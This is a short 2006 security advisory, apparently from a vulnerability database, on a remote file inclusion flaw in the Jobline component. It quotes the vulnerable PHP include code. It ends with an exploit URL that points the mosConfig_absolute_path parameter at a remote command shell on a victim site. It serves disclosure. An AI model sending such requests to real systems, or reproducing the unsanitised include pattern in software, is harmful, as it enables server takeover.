Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13167
HistoryJun 15, 2006 - 12:00 a.m.

Jobline 1 1 1 Version - Remote File Include Vulnerability

2006-06-1500:00:00
vulners.com
8

SaVSaK.CoM | SpC-x - The_BeKiR |

Jobline 1 1 1 Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : Jobline

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) {

include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php");

} else {

include_once("$mosConfig_absolute_path/components/$option/language/english.php");

}

Vulnerable :

http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=Command-Shell